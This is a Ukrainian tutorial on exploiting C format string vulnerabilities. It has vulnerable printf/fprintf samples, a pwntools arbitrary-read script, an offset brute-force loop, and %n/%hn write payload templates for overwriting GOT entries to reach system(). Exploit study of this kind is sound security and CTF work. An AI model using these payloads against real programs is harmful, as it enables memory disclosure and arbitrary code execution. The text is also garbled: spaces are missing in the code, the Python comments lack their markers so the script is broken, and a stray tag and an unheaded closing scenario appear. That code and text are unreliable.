У C printf - це функція, яка може бути використана для виведення деякого рядка. Перший параметр, який очікує ця функція, - це сирий текст з форматерами. Наступні параметри - це значення, які потрібно замінити на форматери з сирого тексту.
Інші вразливі функції - це sprintf() та fprintf().
Вразливість виникає, коли текст зловмисника використовується як перший аргумент для цієї функції. Зловмисник зможе створити спеціальний вхід, зловживаючи можливостями форматного рядка printf для читання та запису будь-яких даних за будь-якою адресою (читабельною/записуваною). Таким чином, він зможе виконувати довільний код.
Форматери:
%08x —>8hexbytes%d —>Entire%u —>Unsigned%s —>String%p —>Pointer%n —>Numberofwrittenbytes%hn —>Occupies2bytesinsteadof4<n>$X —> Direct access, Example: ("%3$d",var1,var2,var3) —> Access to var3
Приклади:
Вразливий приклад:
char buffer[30];gets(buffer); // Dangerous: takes user input without restrictions.printf(buffer); // If buffer contains "%x", it reads from the stack.
Звичайне використання:
int value =1205;printf("%x%x%x", value, value, value); // Outputs: 4b5 4b5 4b5
З відсутніми аргументами:
printf("%x%x%x", value); // Unexpected output: reads random values from the stack.
fprintf вразливий:
#include<stdio.h>intmain(int argc,char*argv[]) {char*user_input;user_input = argv[1];FILE *output_file =fopen("output.txt","w");fprintf(output_file, user_input); // The user input can include formatters!fclose(output_file);return0;}
Доступ до вказівників
Формат %<n>$x, де n - це число, дозволяє вказати printf вибрати n параметр (з стеку). Тож, якщо ви хочете прочитати 4-й параметр зі стеку, використовуючи printf, ви можете зробити:
printf("%x%x%x%x")
і ви б читали з першого до четвертого параметра.
Або ви могли б зробити:
printf("%4$x")
і безпосередньо прочитати четвертий.
Зверніть увагу, що атакуючий контролює параметр printf, що в основному означає, що його введення буде в стеку, коли викликається printf, що означає, що він може записувати конкретні адреси пам'яті в стек.
Атакуючий, який контролює цей ввід, зможе додати довільну адресу в стек і змусити printf отримати доступ до них. У наступному розділі буде пояснено, як використовувати цю поведінку.
Довільне читання
Можливо використовувати форматер %n$s, щоб змусити printf отримати адресу, що знаходиться в n позиції, слідуючи за ним, і друкувати її так, ніби це рядок (друкувати до тих пір, поки не буде знайдено 0x00). Отже, якщо базова адреса бінарного файлу 0x8048000, і ми знаємо, що введення користувача починається з 4-ї позиції в стеці, можливо надрукувати початок бінарного файлу за допомогою:
from pwn import*p =process('./bin')payload = b'%6$s'#4th parampayload += b'xxxx'#5th param (needed to fill 8bytes with the initial input)payload +=p32(0x8048000)#6th paramp.sendline(payload)log.info(p.clean())# b'\x7fELF\x01\x01\x01||||'
Зверніть увагу, що ви не можете поставити адресу 0x8048000 на початку введення, оскільки рядок буде обірвано на 0x00 в кінці цієї адреси.
Знайти зсув
Щоб знайти зсув до вашого введення, ви можете надіслати 4 або 8 байтів (0x41414141), за якими слідує %1$x і збільшити значення, поки не отримаєте A's.
Брутфорс зсуву printf
```python # Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak
from pwn import *
Iterate over a range of integers
for i in range(10):
Construct a payload that includes the current integer as offset
payload = f"AAAA%{i}$x".encode()
Start a new process of the "chall" binary
p = process("./chall")
Send the payload to the process
p.sendline(payload)
Read and store the output of the process
output = p.clean()
Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output
if b"41414141" in output:
If the string is found, log the success message and break out of the loop
log.success(f"User input is at offset : {i}") break
Close the process
p.close()
</details>
### Як корисно
Випадкові читання можуть бути корисними для:
* **Вивантаження** **бінарного** файлу з пам'яті
* **Доступу до конкретних частин пам'яті, де зберігається чутлива** **інформація** (як-от канарейки, ключі шифрування або користувацькі паролі, як у цьому [**CTF виклику**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value))
## **Випадкове записування**
Форматер **`%<num>$n`** **записує** **кількість записаних байтів** за **вказаною адресою** в параметрі \<num> у стеку. Якщо зловмисник може записати стільки символів, скільки захоче, використовуючи printf, він зможе змусити **`%<num>$n`** записати випадкове число за випадковою адресою.
На щастя, щоб записати число 9999, не потрібно додавати 9999 "A" до введення, для цього можна використовувати форматер **`%.<num-write>%<num>$n`**, щоб записати число **`<num-write>`** за **адресою, на яку вказує позиція `num`**.
```bash
AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500
Однак, зверніть увагу, що зазвичай для запису адреси, такої як 0x08049724 (що є ВЕЛИЧЕЗНИМ числом для запису одночасно), використовується $hn замість $n. Це дозволяє записати лише 2 байти. Тому ця операція виконується двічі: один раз для найвищих 2B адреси і ще раз для найнижчих.
Отже, ця вразливість дозволяє записувати що завгодно в будь-яку адресу (произвольний запис).
У цьому прикладі метою буде перезаписатиадресуфункції в таблиці GOT, яка буде викликана пізніше. Хоча це може зловживати іншими техніками произвольного запису для виконання:
Ми будемо перезаписуватифункцію, яка отримує свої аргументи від користувача і вказує на функціюsystem.
Як згадувалося, для запису адреси зазвичай потрібно 2 кроки: спочатку ви записуєте 2 байти адреси, а потім інші 2. Для цього використовується $hn.
HOB викликається для 2 вищих байтів адреси
LOB викликається для 2 нижчих байтів адреси
Потім, через те, як працює формат рядка, вам потрібно спочатку записати найменший з [HOB, LOB] і потім інший.
Якщо HOB < LOB
[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]
Якщо HOB > LOB
[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]
32 біт, relro, без canary, nx, без pie, форматний рядок для запису адреси всередині main в .fini_array (щоб потік повертався ще раз) та запису адреси до system в таблиці GOT, що вказує на strlen. Коли потік повертається до main, strlen виконується з введенням користувача і вказує на system, він виконає передані команди.